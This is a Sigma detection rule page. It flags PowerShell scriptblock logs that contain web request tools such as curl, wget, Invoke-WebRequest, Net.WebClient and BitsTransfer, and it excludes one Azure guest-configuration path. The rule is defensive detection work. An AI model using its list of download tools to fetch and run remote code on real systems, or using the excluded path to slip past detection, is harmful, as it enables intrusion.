Usage Of Web Request Commands And Cmdlets - ScriptBlock
Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via PowerShell scriptblock logs
Sigma rule (View on GitHub)
1title: Usage Of Web Request Commands And Cmdlets - ScriptBlock
2id: 1139d2e2-84b1-4226-b445-354492eba8ba
3related:
4 - id: 9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d
5 type: derived
6status: test
7description: Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via PowerShell scriptblock logs
8references:
9 - https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/
10 - https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell
11author: James Pemberton / @4A616D6573
12date: 2019-10-24
13modified: 2025-07-18
14tags:
15 - attack.execution
16 - attack.t1059.001
17logsource:
18 product: windows
19 category: ps_script
20 definition: 'Requirements: Script Block Logging must be enabled'
21detection:
22 selection:
23 ScriptBlockText|contains:
24 - '[System.Net.WebRequest]::create'
25 - 'curl '
26 - 'Invoke-RestMethod'
27 - 'Invoke-WebRequest'
28 - ' irm ' # Space before and after to avoid false positives with 'irm' as a substring
29 - 'iwr '
30 - 'Net.WebClient'
31 - 'Resume-BitsTransfer'
32 - 'Start-BitsTransfer'
33 - 'wget '
34 - 'WinHttp.WinHttpRequest'
35 filter:
36 Path|startswith: 'C:\Packages\Plugins\Microsoft.GuestConfiguration.ConfigurationforWindows\'
37 condition: selection and not filter
38falsepositives:
39 - Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer.
40level: medium
References
Related rules
- Potential DLL File Download Via PowerShell Invoke-WebRequest
- Potential Data Exfiltration Activity Via CommandLine Tools
- Usage Of Web Request Commands And Cmdlets
- Malicious PowerShell Commandlets - PoshModule
- Malicious PowerShell Commandlets - ProcessCreation